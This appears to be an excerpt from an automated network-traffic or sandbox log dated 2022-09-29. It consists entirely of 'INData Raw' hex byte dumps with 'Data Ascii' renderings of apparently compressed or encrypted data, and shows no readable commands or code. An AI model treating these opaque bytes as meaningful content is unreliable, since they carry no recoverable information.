                                                                                                                                                    2022-09-29 12:59:14 UTC19799INData Raw: 9c d7 4d a5 83 e7 4f d9 25 8f 1f 86 e3 81 ee 0d 68 5c dd 41 1f 41 5b 2c 99 41 55 32 8b c4 6d 4c fe 22 bb f1 41 b3 e4 d1 99 f3 a7 69 f0 65 3c f6 58 ee 92 af e0 55 d5 8a d2 92 10 69 79 97 5e bb 01 57 98 12 55 e5 75 d9 8a 43 e8 e8 f9 17 71 4d 6a 46 76 dc d6 7b 53 d6 38 26 12 4e 55 4c cd ab b8 ca 0a 7b 28 10 a7 a7 c7 44 c1 cb 89 52 91 45 6e a2 28 da 0c fc 2c 88 f0 c7 e0 b2 7c 05 0e 65 9d b7 cd a9 da 72 84 00 72 05 e8 81 23 c6 9b c0 ae 86 10 d8 b0 77 e8 db a8 a4 a4 da 87 88 ab 28 a2 30 f6 f0 75 22 c6 98 4f 46 1d 5b bb 94 d1 6a b1 25 95 a1 fa c5 36 8c 60 f9 27 e1 7d 9d 15 68 45 1c a8 41 3d c8 c0 78 41 10 a5 be 0a ca 5a 07 2c 85 1c e2 cc b9 d4 4d 8e 4a ce e1 15 f6 71 71 ca 7d 9b 88 d1 6c 01 42 f9 bc c0 2c 04 00 1f 73 20 5d cc 7c a4 9d 21 cf 7f 4d a3 0e 89 56 34
                                                                                                                                                    Data Ascii: MO%h\AA[,AU2mL"Aie<XUiy^WUuCqMjFv{S8&NUL{(DREn(,|err#w(0u"OF[j%6`'}hEA=xAZ,MJqq}lB,s ]|!MV4
                                                                                                                                                    2022-09-29 12:59:14 UTC19815INData Raw: bb 5c 11 b1 ae 78 dd 9e 87 1a 37 dc 89 39 b2 36 8c ee 79 82 b3 24 89 bc dc d8 2d cc 5c df d0 e6 08 06 82 45 7c 1e 71 01 d4 6a 44 04 39 1d 75 f9 84 cd a6 7a 67 9d d2 76 b1 6e a1 85 a1 ba e3 fb 06 d7 92 00 ec b2 8e 07 4f 3c 14 91 b6 40 ca b6 c4 4d e9 68 e3 2b ca 3a 5e ef bc f8 6a f9 12 1a d3 cc c3 9e 0f ba 43 ac 30 4f e6 43 71 5f 3e 11 52 45 3f 4b fa 47 4b f6 ca b9 d2 f8 9e f3 2c 7d c9 fe 27 33 49 d0 9b 7c 30 cb 52 19 e0 ac ad 89 9a 02 0a ae 1e a9 c7 12 84 ce 4c 4e b5 94 30 d4 b8 66 a3 38 ca cf 09 08 d8 a2 e5 08 d1 5c 60 df af 7f 50 65 ed fe 32 18 30 86 89 1f f1 fb 0d d1 95 64 cb d9 28 9b d2 bd c0 2d 55 15 11 e9 75 ac f9 41 5a d4 91 37 88 89 37 25 43 c2 12 b3 f3 1b 9b 0b aa af 15 87 a3 53 08 02 e2 9a 5b df 41 f3 a3 3f 0b 1f 17 64 d9 9c b9 06 3b 47 01 f8 36
                                                                                                                                                    Data Ascii: \x796y$-\E|qjD9uzgvnO<@Mh+:^jC0OCq_>RE?KGK,}'3I|0RLN0f8\`Pe20d(-UuAZ77%CS[A?d;G6
                                                                                                                                                    2022-09-29 12:59:14 UTC19831INData Raw: d1 44 f2 26 81 05 3d ab d6 47 ce 23 3c 6e 1c 6c 10 87 7a 0a 64 d6 bd f1 42 09 3c fe ac c5 86 7f 78 c1 1c 87 51 a0 cd 28 99 f3 0b e8 f7 ab 8f f4 59 bb da e6 1b 74 9f f9 aa 43 19 c5 69 74 3b 71 4c a7 0f b9 3f 21 7d f0 6b ea f0 ce 57 b0 96 65 12 10 98 c4 2c 72 e8 0c e6 bc d4 68 69 f6 f1 94 1e 5d 63 d8 54 c0 49 72 a5 b3 20 8d ef bc f0 ec 83 a2 e6 b6 c2 9a 04 cd 46 bc 52 4e 84 3a 17 c9 04 40 f9 7d f0 a9 79 ef 94 21 7a 3e bd f1 59 9b f4 e6 c1 09 47 73 cf 73 c3 fd c7 6b 8c 21 56 3d a1 49 3d d1 f5 d2 fa f9 ec f6 a4 75 6a 0e 30 57 cd 86 03 43 a4 53 15 bc 45 7a dd 90 f8 ae d1 86 3e 34 1f 54 b5 56 1c ab b1 aa 13 56 b2 ae 5f d7 8c bf 7a 2c dc 9f c2 86 68 aa 05 2b d1 51 27 eb b4 87 49 a6 4a 52 31 26 27 c6 7d b8 6a 48 46 fe b3 ed 70 49 65 5f 65 d4 38 25 71 6d 66 32 ac
                                                                                                                                                    Data Ascii: D&=G#<nlzdB<xQ(YtCit;qL?!}kWe,rhi]cTIr FRN:@}y!z>YGssk!V=I=uj0WCSEz>4TVV_z,h+Q'IJR1&'}jHFpIe_e8%qmf2
                                                                                                                                                    2022-09-29 12:59:14 UTC19847INData Raw: 2a 35 db ec e9 23 1a fb 18 8e c6 74 c4 0b 7d 82 32 5a 0c 43 53 f3 ce b8 7c 36 b3 06 bd 29 21 33 33 6a 18 aa 1a 12 dd c9 21 84 f2 d7 f7 75 a0 cd 84 cc ac 02 58 e6 d6 42 17 97 60 48 43 86 99 8b 34 61 04 04 42 7b d3 6e e7 6b a1 7f 30 36 a8 20 68 64 55 b4 be 6f 3a a7 10 a9 ba dc 8d 06 dd 0b 3e 6b f6 ba cb 06 64 c8 e8 fb 4d ae cb e3 df 32 9d e3 33 5b 20 3a 66 43 ae df 81 cb 8f ff aa 1f 4d c1 38 3a bc 56 00 6a cc 2c 5c d5 8f a7 bd e9 b8 00 e2 da d0 35 76 c9 56 05 35 75 8c cf 18 87 4d ca bb bd 07 b9 b7 d9 78 4d dd 48 4f c0 aa db c2 0f 03 cc 9a bb 82 db 31 b4 7a 2c fb 85 57 cc 64 f4 6d ee 02 e9 23 aa 68 90 0e 99 9b af 6a 73 8b 01 0d f6 35 ce ff 59 74 37 d7 b6 73 bb 21 d6 08 93 7f d9 b1 22 2e 8b fe d5 2a c6 5a 9a 23 e7 e4 55 6f 49 fc 8e 27 0e b5 58 2e 01 7c 18 2b
                                                                                                                                                    Data Ascii: *5#t}2ZCS|6)!33j!uXB`HC4aB{nk06 hdUo:>kdM23[ :fCM8:Vj,\5vV5uMxMHO1z,Wdm#hjs5Yt7s!".*Z#UoI'X.|+
                                                                                                                                                    2022-09-29 12:59:14 UTC19863INData Raw: 9f 2c a9 1e 3e 1b 0c 78 17 10 fb 70 c9 cb 64 27 c1 5f 5d 4f 6e 86 13 15 ba 98 b3 1d e6 65 29 59 86 3a 1c f1 e8 b9 5b c4 ad 73 a0 2a 4c 87 99 57 97 2c 59 a6 64 df 2e 04 39 b3 5f de cd 7a 4c 3e 2e 8f c0 82 ab d3 d5 da 69 8f 9c c2 66 86 f0 4c ca 52 02 ae 88 59 9f a8 dd a1 7f 54 1a 54 5a 2f c9 75 6b 4e 7a 73 03 05 30 ad 1b e7 58 d4 32 82 b4 d1 d3 9f 64 c7 6f 1d f3 0e 4f b7 10 5f dc 75 2f 6e 9e 77 b7 e3 69 eb 50 f7 fd 86 99 58 6e c6 f6 aa 04 2d f8 26 8e aa c7 21 47 36 2d c0 76 96 14 3f f7 4f 5e 1e 28 5b 6f 19 5b 86 8c 50 5a fd b9 50 19 7d 5c d8 29 c6 55 5a c0 b0 ea 17 6f dd 63 60 c8 05 0c 0f ce ae 68 d0 9a 16 d8 73 90 f8 77 21 a3 dd ee 91 b1 f7 03 a7 70 c7 9a 57 bc 74 63 b1 19 db 55 5f 55 90 a1 eb 86 3d ce 3b 55 c7 6e ea ad 3b d6 61 52 da 32 c3 19 e2 8e 19 25
                                                                                                                                                    Data Ascii: ,>xpd'_]One)Y:[s*LW,Yd.9_zL>.ifLRYTTZ/ukNzs0X2doO_u/nwiPXn-&!G6-v?O^([o[PZP}\)UZoc`hsw!pWtcU_U=;Un;aR2%
                                                                                                                                                    2022-09-29 12:59:14 UTC19879INData Raw: b8 db c3 ed c8 f1 bf 8f ae 4a 49 27 bc a4 b4 95 2d da 00 e6 f4 d2 2a fe 21 e3 f6 92 52 4c ab 9a 1c dc ee 47 75 aa fd b9 df 5c 2b 72 59 d8 49 49 00 1b e6 04 a7 c5 6a a7 95 c7 cc 9d 77 a8 c6 0e 6b ab 47 a0 c5 f6 1e d0 c4 45 e3 05 f4 f8 3d 46 9d 3e 42 5c a4 eb 7d 8a 44 16 a4 e5 17 97 ba bf b4 2e 49 0a 06 a1 ed 5c 69 63 27 53 1a 49 41 0b 6d f9 b5 04 fe 1a ee ae d7 92 3f 0d 8c c7 93 ab 5a 19 56 16 fd 0b a7 20 18 89 31 4d 51 e0 47 78 41 18 72 96 b7 17 d4 c6 51 05 34 1c cb ba 90 d8 b3 5b 65 9a 4f dc e6 7b e6 72 18 6b b6 60 9f c5 88 fc f1 d8 9c 2b 99 3a 4f df 1c a7 55 9d 73 9f 99 5e 66 9f 10 94 ad c6 33 90 89 b8 64 88 f1 97 ce f1 9f b2 f2 91 63 17 92 9e ed ec c1 7c 37 13 9c cf 08 fd b5 32 be bc 6b 59 f2 e0 24 b0 d9 24 e4 8e 84 65 27 3f 7a b2 52 2a 79 42 b4 4b 89
                                                                                                                                                    Data Ascii: JI'-*!RLGu\+rYIIjwkGE=F>B\}D.I\ic'SIAm?ZV 1MQGxArQ4[eO{rk`+:OUs^f3dc|72kY$$e'?zR*yBK
                                                                                                                                                    2022-09-29 12:59:14 UTC19895INData Raw: 84 ca 26 59 12 ce 24 47 1f 9a d9 79 03 fb 66 2e 22 26 1a 86 df 07 59 bb 29 d3 a2 da fc 81 3a 53 ba 25 c7 ba 9a 0d c2 aa 09 e6 3a ba 1d fa 22 90 be 69 c3 d5 f5 0f 47 be 43 5c 70 5d c9 68 00 09 0b b2 21 33 2b 20 65 a4 7f 13 f2 bd e0 be 4a ed aa 35 f1 03 e9 75 12 e0 fa ba c3 03 a2 9d 4e 95 9c e3 24 58 1c f5 95 76 da 94 92 f7 02 5f 26 76 08 1e dc 63 61 2d 4d 09 dd 2c a1 81 b6 23 45 a4 96 fa 81 a4 7d de b8 37 af 3f c5 be 57 49 71 f6 76 92 e2 51 10 0c 9e 71 b8 10 d2 91 dc 5f 9c ae c3 11 9a f9 5d de e2 47 66 a3 a8 93 05 2c a1 0e 1e 64 d4 83 02 d6 b9 bd cc 76 fd 56 31 da 64 a1 1d cf c4 4e f4 af ce 9b 07 ef db 83 9b fc 19 80 a8 71 c4 49 4b 7a ed b7 43 51 48 93 e0 36 e1 3f 87 8e fb 6a 75 6c 50 9a 2d 8d c1 3c a0 8f 75 07 87 a9 2e 96 96 b6 ff d5 1f 5f b7 e7 9f d4 1e
                                                                                                                                                    Data Ascii: &Y$Gyf."&Y):S%:"iGC\p]h!3+ eJ5uN$Xv_&vca-M,#E}7?WIqvQq_]Gf,dvV1dNqIKzCQH6?julP-<u._
                                                                                                                                                    2022-09-29 12:59:14 UTC19911INData Raw: de 7a 7f ba 10 ae 04 d6 4c 75 b6 34 ba 9d 98 1c 66 7e 83 1d 13 68 65 1d 51 15 b7 2e 89 f6 94 2c 36 f9 9e b2 3b 63 a1 43 da 1b a2 c5 dc 39 c8 86 8e 2a 18 c2 36 44 e0 bf 3e 4a 6e ab 49 9f c5 01 17 7b d2 cd 8d c6 ad 7f 9e a3 11 97 f8 d3 c9 7c 43 47 2d b3 7e 62 d2 81 b9 99 68 e4 01 b6 ec 31 21 43 1f b6 5e a5 8e bf 0a a4 45 47 4b 87 ac 58 34 a6 65 64 09 42 68 c0 66 cc c0 d5 d8 3d 0e cb ac 13 5d 6c cf 63 1a a2 0b a4 d3 71 03 9a aa ad 84 61 50 4e e8 81 b4 61 5d fe 53 ec 28 0b 49 34 ec a3 17 08 aa 84 95 4c 19 93 ea c8 d2 94 59 b3 cf aa b3 85 9a 39 94 26 4a 57 12 33 c9 9c e2 f4 77 54 c1 a5 44 1a 72 9d d5 df 17 9d 91 b4 20 89 84 f7 be 93 ea 29 be 7e eb 27 ff 29 ae 4e fc 79 c2 ff af d5 45 d2 aa 87 77 0c 11 60 aa 2e 46 b8 04 c2 31 e7 0a 1c dd 00 a8 98 b4 b5 0f 44 e4
                                                                                                                                                    Data Ascii: zLu4f~heQ.,6;cC9*6D>JnI{|CG-~bh1!C^EGKX4edBhf=]lcqaPNa]S(I4LY9&JW3wTDr )~')NyEw`.F1D
                                                                                                                                                    2022-09-29 12:59:14 UTC19927INData Raw: 0b 7e 25 ab df 2e 78 0f ae 60 24 19 d4 58 4a 80 8a 06 c6 2f bb 49 3f 42 48 08 8d ff a9 af 38 95 08 e4 b4 1c d7 f1 83 35 97 38 63 81 7c 73 46 66 80 68 bd 17 9d 65 9a a5 22 37 cb c0 d2 11 59 86 e6 0c 77 b2 f0 68 19 26 d4 bd 97 29 c6 54 48 5a 74 80 e3 9a bf 50 11 90 a3 aa ad 37 7b e3 fb a0 d0 d8 fe da e6 b0 45 f5 e1 b8 8a f3 4e 99 e5 2c 5c 73 ae 90 1d 1b 54 d9 e0 2d 89 01 ba 02 7e fa fb f2 2b 08 bf 6b 95 51 97 58 77 a3 3e ba 25 6e 4b 7b fe 85 6d 8f ac 26 f2 af e4 dd 77 3f 55 7a c4 17 6d 2e df 33 ea d9 b7 c5 91 5b dd bf f3 3a 2e a2 38 b4 68 9b 87 ab fe aa 01 cf e6 7b da a3 9a 8b 5a 04 0f 22 d3 85 e2 fe 29 d3 67 f0 ee e4 a7 27 62 9d 03 70 fb 45 94 5f 42 43 bf 84 cf 6d c8 e0 45 5d 1d a4 75 b6 3c 55 95 96 31 e7 89 12 15 09 3e fa ba eb 8d a9 04 a0 c9 9c cd 46 dd
                                                                                                                                                    Data Ascii: ~%.x`$XJ/I?BH858c|sFfhe"7Ywh&)THZtP7{EN,\sT-~+kQXw>%nK{m&w?Uzm.3[:.8h{Z")g'bpE_BCmE]u<U1>F
                                                                                                                                                    2022-09-29 12:59:14 UTC19943INData Raw: 1b f7 9a 0d 25 61 d1 23 cd bc 46 bc 04 04 d5 cd b5 55 6c 8f 63 53 ae 6c cf 3d 56 5e 69 e8 33 e7 f2 90 cc 41 69 6b 36 05 1c 6f bd 9e 15 6e d0 25 78 d7 10 1d 01 2f e6 47 2b c3 e8 3d 91 db 88 ae 61 c7 76 ce c0 50 c9 81 a0 7f e1 30 1b 08 14 47 91 d5 80 3f 0e 50 de ff 67 41 d5 a8 c1 39 31 bb dc 0d f1 e8 7f e7 be 7e 0f ee 69 40 13 f2 01 78 1b a5 83 20 a0 c9 cf 77 c2 68 39 74 45 db a9 ac 84 7e a1 36 1f 3a 5f 65 27 a4 35 b0 38 f5 ef 5e 3b c2 2b 33 76 c1 12 8d e7 7f b4 fe fc d3 ab f9 de 5c d1 84 cf 27 3e a6 f4 02 67 8b ae 93 f5 3e e9 f6 28 b9 81 24 e1 3d 94 5a 2b 25 36 49 a1 70 72 7e 87 95 5d da 1a b4 95 a7 53 52 0f e9 0c 5c 47 1b 04 2a 94 e9 ab f5 8e 5a 8f 3b 26 0a 46 4f f4 3b 3f 79 9d 78 01 3e 6c ba 4b dc c8 fe 54 8a de d1 4c b4 55 b6 1e 8c e4 d1 57 d5 0c f2 4a
                                                                                                                                                    Data Ascii: %a#FUlcSl=V^i3Aik6on%x/G+=avP0G?PgA91~i@x wh9tE~6:_e'58^;+3v\'>g>($=Z+%6Ipr~]SR\G*Z;&FO;?yx>lKTLUWJ
                                                                                                                                                    2022-09-29 12:59:14 UTC19959INData Raw: c7 96 e5 ee 47 9b 60 62 41 76 3f be 12 7d 2a 8f 95 59 ca 06 48 c3 8b c1 e0 b6 65 6e 75 f8 dc 7f 90 14 e2 33 cc 1a 1c d5 9f 86 e0 37 a6 23 d7 6a d6 19 c1 5b 46 dd 7e 83 df 90 fc 26 2b db 28 7d d0 d4 e5 54 56 62 61 56 e7 cf 8d 74 84 4d f3 40 11 2c 71 8c e8 14 84 28 fd 0e 76 f4 e8 bb b3 d1 78 53 43 71 fa 15 64 29 4e b3 1f 89 15 95 f3 34 cb 80 64 a9 f5 b9 ca 40 61 4b 8b d0 8a 08 ec 47 68 dc e9 c4 90 04 86 a0 80 e2 d1 47 2b 51 53 b4 a6 8f a0 87 a5 f4 41 f1 e5 a9 79 c3 58 0c b0 70 5e 54 17 6a d3 79 98 32 5b 91 0f 6d 02 1b 6c 2a bb 48 11 30 2a 65 59 5b ec e1 00 04 8e a4 48 41 2b 32 8c d0 7f e6 cb 7e 1e f8 bc ed 6d 36 1c e8 00 c1 6f 0a 16 91 0a 10 e4 4f 19 9a 57 bc 9e 4b 4a 2c 95 f9 86 ad 97 7f 6c 0a 2e b6 09 5a 6c e8 5b df 00 05 f7 b7 9e 1c 8c 8c 80 f3 b7 6c 91
                                                                                                                                                    Data Ascii: G`bAv?}*YHenu37#j[F~&+(}TVbaVtM@,q(vxSCqd)N4d@aKGhG+QSAyXp^Tjy2[ml*H0*eY[HA+2~m6oOWKJ,l.Zl[l
                                                                                                                                                    2022-09-29 12:59:14 UTC19975INData Raw: 43 37 5a 2d bb b5 29 43 12 4c 37 f3 19 07 3b a8 0b 57 3c 95 a5 db 65 71 24 81 85 7c ea c1 b2 36 5a bd 1c d9 18 0d 2b 14 3d 3b 89 2d bf f7 f2 49 44 fc 50 6e 7f 5b be 47 cc db 01 82 e1 78 83 67 d6 0d 12 ab ba b9 80 e8 1d 67 cd 58 8c 89 eb 6d fb 35 4a be ed cd 1e ad ff 34 7c ea 9e 97 5e 7f 84 b8 0d aa 38 15 06 27 1b a8 1e 09 bd ac ad 0a 18 23 fc d0 10 d5 a4 ed 7a b1 2a 7d d1 94 9b e4 05 31 17 93 5a de d4 4f 6d 36 42 3c 31 7f 8d 33 90 e2 ba ae 79 eb 0b 6f 43 5a e5 cb d9 25 63 c6 1e 2f 6f d3 30 7c 7e b9 05 15 f5 de 82 b8 d2 24 3d 02 7a db c7 54 b0 83 49 ec 72 05 10 a1 c3 f3 ae 6b c0 90 73 a8 69 0b f3 a5 c2 c6 cf 02 69 a3 4d 0a 08 33 5a 89 92 5a 76 f8 64 12 18 e5 20 29 bf 5c 40 6c a9 67 79 a8 ed 09 a3 68 69 ea b5 96 da 28 3f 15 f1 da c7 99 3a 67 fb b5 96 36 65
                                                                                                                                                    Data Ascii: C7Z-)CL7;W<eq$|6Z+=;-IDPn[GxggXm5J4|^8'#z*}1ZOm6B<13yoCZ%c/o0|~$=zTIrksiiM3ZZvd )\@lgyhi(?:g6e
                                                                                                                                                    2022-09-29 12:59:14 UTC19991INData Raw: 85 d4 53 39 d6 67 b1 ac 1e b3 ab 18 61 7b 44 0b cf 66 7f da 43 65 e2 69 c9 fe 3e b5 63 71 e9 cc ef 1e 75 25 e0 8f ac 68 d4 4d 67 8c 06 1d 29 1f be c2 9f c4 12 72 45 c9 ca 7a ca f4 eb ed 03 56 3a 67 04 52 ee 7b ce f1 65 4f b1 06 3d 86 51 90 62 8f 1b 79 96 b5 95 60 46 28 8a f7 7e bb c7 1b 68 b3 96 8e f3 bf 1b 24 83 ba 26 74 b9 95 ed ed 94 f3 0d 4d 2b 04 87 20 68 21 58 c6 9e f6 9e 94 b2 2a 46 c3 d6 27 0e e3 f8 b7 70 4b 71 e1 db 08 39 c8 e8 1c be 83 19 0d c4 0c 15 29 ef 98 5a cd 12 4b 52 a0 b8 d7 96 ed ee f0 50 18 c5 16 31 d4 6e 03 aa b4 60 9e 08 17 dd 6b f3 7e 55 e3 12 20 a3 de e0 cd d8 41 90 07 96 53 03 24 ca a3 e7 81 8a db 30 41 82 ee 1b 20 e5 d3 e5 88 ed 91 36 ad e0 6e f5 68 ab 16 e7 a6 61 df 7f 4a f0 a4 94 55 fc fa 54 23 56 6e 61 ec 96 df 3b 5d e0 45 9a
                                                                                                                                                    Data Ascii: S9ga{DfCei>cqu%hMg)rEzV:gR{eO=Qby`F(~h$&tM+ h!X*F'pKq9)ZKRP1n`k~U AS$0A 6nhaJUT#Vna;]E
                                                                                                                                                    2022-09-29 12:59:14 UTC20007INData Raw: af 9f 9d 45 78 21 e8 6d be bb 49 b9 8e d7 7d 01 a6 d2 15 91 d8 33 88 5a a7 01 c6 de d9 91 07 e4 d3 ea dc 32 bf ad 74 94 5a ef 6d 78 b8 ea 32 7c 1c e9 3a 36 4a 15 3c d3 3e 41 2d 97 61 ab b9 02 16 a1 f3 05 27 cd b1 52 52 96 b2 44 9f b6 1e 2d 5e a8 59 da 6f 94 c5 79 a4 66 d1 a5 52 47 fe 9b 51 ce a6 5d ad 0f c7 a9 09 6f 3b 2b 9d 8c 92 d7 13 38 ba 29 db a6 d5 25 64 15 7c 7a 62 cf 5f 48 df 45 4a 88 e9 4b 45 0d 42 91 0a a3 4e 24 a5 86 6c b3 a9 4d b5 9e ea 49 99 72 70 a3 1f 72 7a d0 84 9e c9 7e ae 1e ec e1 83 cf 9a 21 6f 48 ce ac 55 dc 25 61 9e df 02 67 cf e4 72 85 6b d2 f1 6a 79 cb a5 4d da 4a 0c 48 71 57 4c 30 15 c0 17 4e 87 65 de ee c2 0c 98 ff 14 48 53 16 f7 47 87 21 ce db 07 27 d9 90 c2 42 fe 95 9e 8c 14 d8 5e 19 1f 8b 1d 98 b9 c4 bf bc db 46 48 46 c9 4c c0
                                                                                                                                                    Data Ascii: Ex!mI}3Z2tZmx2|:6J<>A-a'RRD-^YoyfRGQ]o;+8)%d|zb_HEJKEBN$lMIrprz~!oHU%agrkjyMJHqWL0NeHSG!'B^FHFL
                                                                                                                                                    2022-09-29 12:59:14 UTC20023INData Raw: 23 01 34 0b f4 7d e0 04 ff ea c7 b0 23 68 06 42 6f 56 15 6c 7d 48 4e 15 a6 bb 85 df 08 36 a4 b3 7a 5a 57 41 6c c6 c5 ff 8e 03 18 41 66 b7 4a 7c 6a 9c 8d 8b e0 26 be 67 a8 ba 29 23 d2 e8 ea 9e e7 93 7b 59 f5 a9 5a 67 9e 70 30 cc 1e 6a e0 a3 cf 62 10 6b aa 37 16 4e a2 7a ac 03 9c de 2a a6 73 aa 63 cb 55 a8 c5 be 8b f0 39 ca 56 68 44 b1 ee f1 93 63 af fb 77 7c ff 13 99 85 35 21 80 c8 00 d7 35 41 50 90 5e ef 16 e5 0e ae 8b 4b c3 e7 8f 7b 7a da 0b 69 87 08 e3 a5 83 37 db cb b2 cd 5e 72 ea 20 d6 a0 59 1d 01 b8 7d 3d 86 ce ca 8b f2 a7 e5 e9 66 78 00 ea 2b 43 f8 64 c3 ce 2d cc 92 d3 50 31 fd be 15 33 60 40 36 ec f3 c3 fb 61 de bf 79 04 eb b0 a1 34 ad a1 2c 43 51 fd a7 19 85 12 22 ac 60 5b c2 86 2b 5d 54 bf c0 6a 44 20 41 13 b3 f2 77 cb 2e 35 b4 08 bb c6 bc 3e e8
                                                                                                                                                    Data Ascii: #4}#hBoVl}HN6zZWAlAfJ|j&g)#{YZgp0jbk7Nz*scU9VhDcw|5!5AP^K{zi7^r Y}=fx+Cd-P13`@6ay4,CQ"`[+]TjD Aw.5>
                                                                                                                                                    2022-09-29 12:59:14 UTC20039INData Raw: ce 26 d4 7b c6 c0 c6 df 46 ff af c0 14 87 48 22 61 8b b1 54 ec e1 a4 53 b7 43 c6 e8 0e 41 cf ec 30 14 8a 3f ba 1a 34 68 db 11 84 07 75 6f b2 5f 19 3f 41 49 7b e8 a1 45 b4 c4 84 61 cd 98 aa c4 e9 25 4a dc 95 53 f6 f6 fb 96 5d 2f ea 5f 04 c5 04 a1 5b fa 34 f3 64 bd a6 86 6d 34 00 cc 69 4e 51 f6 a0 5f 53 44 b1 c6 bb f1 55 01 35 ef 7a 1a 07 df 2b 92 00 d3 61 7d ca f6 ea 79 7b e7 1b 6e a3 99 88 ef dd 61 4e 94 a3 60 b9 0c 5f d5 da 70 34 44 d0 03 96 63 c4 1f cb 92 e0 cf a8 b3 62 de 2e 94 c9 f8 6e 93 dc 1f f8 7f de 3e 80 e0 56 91 37 b9 bb fc 36 63 dd 77 be c1 d3 56 a8 9f a9 05 7a 47 56 0e 94 8b 57 c7 ba 84 8b 0e 60 43 7d 42 3b c5 91 5c 89 0e ea 8d 85 4f 9d 62 f5 8f 2d bf 82 13 81 31 d8 29 84 0d 99 50 71 e1 30 9c 66 ab 57 f4 54 82 98 0d e5 a4 0f b3 13 05 1d 5a 28
                                                                                                                                                    Data Ascii: &{FH"aTSCA0?4huo_?AI{Ea%JS]/_[4dm4iNQ_SDU5z+a}y{naN`_p4Dcb.n>V76cwVzGVW`C}B;\Ob-1)Pq0fWTZ(
                                                                                                                                                    2022-09-29 12:59:14 UTC20055INData Raw: 3f 0c d4 80 d6 45 e4 41 bd ba 8d 76 2c af 5c ee b5 00 5f 9a e2 51 9e 7d 39 fc 54 ac 13 f1 bc 1e 1c b4 ee 3a 05 55 eb 0d 41 f2 b5 89 02 88 66 04 ea 62 6a 5f a4 62 da 7b c4 52 02 8f 9e 53 19 33 e7 31 24 6f c3 25 2c 95 8f ea ee 75 c0 06 0b e4 de 5d 90 a4 14 a4 6d 0f 47 f4 75 54 91 d6 26 cc 32 62 ed bb 7a 44 2f d2 2c fd 1c 8f a5 c1 0a eb 61 bb 6f 94 54 c5 87 df f1 c7 a3 b1 11 72 85 f2 04 9c 0b e7 61 23 80 c7 b4 03 e7 92 64 e6 59 00 c0 a1 09 03 8c 3b c3 e3 bb 99 0e 6f b8 70 3a e1 e7 02 8c 73 65 65 fb 3d 71 8b fa c6 2e 98 b1 87 0a 99 e2 43 f8 87 76 ee c1 87 9c c2 27 1b 17 30 0d e9 ff 4a 74 69 36 dd 95 37 b6 86 be 00 40 17 fb af 34 6f cc cc 29 ef 52 65 b3 df 22 02 10 d3 f7 7c 61 89 88 8c 2f 42 2f 53 01 72 2b 00 4c 21 aa c2 67 5b 93 e0 d4 10 cb 0b 48 a7 e3 54 53
                                                                                                                                                    Data Ascii: ?EAv,\_Q}9T:UAfbj_b{RS31$o%,u]mGuT&2bzD/,aoTra#dY;op:see=q.Cv'0Jti67@4o)Re"|a/B/Sr+L!g[HTS
                                                                                                                                                    2022-09-29 12:59:14 UTC20071INData Raw: 3c 6f 5d 86 96 49 e6 03 09 5b 09 35 48 76 e1 0c 65 2d 8c a3 a2 09 16 33 f8 d4 ae 91 b2 32 0c 28 84 06 e1 d8 dc 8d b5 19 dd c0 9c 2a 42 63 be 22 36 ad c2 f0 21 f7 50 49 a0 26 81 00 2d 7b 61 5f 5f dc e7 80 a2 5b 3b b3 71 12 55 ad 1f 03 75 1a ad a0 0a 66 65 68 d0 62 dc c2 57 a8 81 4b 21 31 7d cb 03 71 06 6f 74 b9 ff f7 0a dc 45 f4 af dd 3c d8 ea b3 4f 66 36 96 3f dd 58 0b 3d ac c6 44 e6 6e 1d 52 69 e7 2e 71 cd 4a 0f 8e 0d 03 0a 49 5a 03 10 2c 3d b5 66 3b a2 c9 bf 73 76 ca 1e d0 0e b1 41 65 05 87 94 be 20 5b 60 e3 17 41 28 53 38 18 a1 6a cc ce fd fa 88 b5 18 39 a5 07 22 73 03 21 de 02 0a 55 d0 78 24 bb 5e 91 8f 2a 84 f9 a0 49 57 66 6c fe d9 85 9b 5f d3 61 7c aa ef 7f 26 33 ff 69 26 9c 58 a1 9b 8c 87 c7 38 2d b6 22 1e dd 49 f7 11 ec fe 70 0d 44 b3 4a ae f7 0d
                                                                                                                                                    Data Ascii: <o]I[5Hve-32(*Bc"6!PI&-{a__[;qUufehbWK!1}qotE<Of6?X=DnRi.qJIZ,=f;svAe [`A(S8j9"s!Ux$^*IWfl_a|&3i&X8-"IpDJ
                                                                                                                                                    2022-09-29 12:59:14 UTC20087INData Raw: 3a 1a 5e 2e 38 35 69 ab e9 57 fa 0f a2 ae 4e f9 23 5a 3d 4a 1b c3 ac 47 2a 05 24 64 75 54 16 d8 6c 5a 77 4c 05 ae af 8e 59 6a 2e 6c df 59 a8 5a 5b af 38 1c 93 57 8d 91 6c 8f 8e 0c 70 eb ab 7e e1 7c 20 98 f9 3a 6f 2d 52 5e 31 77 d7 57 0f 24 7f b2 20 84 e9 02 b7 42 f3 85 6d ef 3f 26 d5 92 6a 4b 24 96 35 64 84 1d a9 a8 7c a8 dc a1 be 02 22 19 c8 22 48 6c 1b 90 89 eb 0e 9b 14 47 79 b3 a9 aa b8 ee 29 0d fe e4 16 58 79 e7 69 59 08 73 c6 5e 6c ec e9 62 e3 ce 5c f0 38 6e f8 de c3 37 a0 0d 65 ca fb ea 94 4b a2 ea 23 35 c3 00 a3 fa 0b 66 aa 88 28 16 51 59 35 40 6c a7 9a 48 d3 51 47 63 e0 11 ad 45 af 81 3e 8c 15 81 72 85 e4 08 e6 9c 49 5d bb 4d a4 e5 dc 7a 11 14 ff 51 38 40 3e aa b5 5c 0e 40 c7 4a df bd 3e e6 06 b5 1d d9 91 65 b4 02 a2 35 f2 11 a8 8e 0e 6b ef 3e c0
                                                                                                                                                    Data Ascii: :^.85iWN#Z=JG*$duTlZwLYj.lYZ[8Wlp~| :o-R^1wW$ Bm?&jK$5d|""HlGy)XyiYs^lb\8n7eK#5f(QY5@lHQGcE>rI]MzQ8@>\@J>e5k>
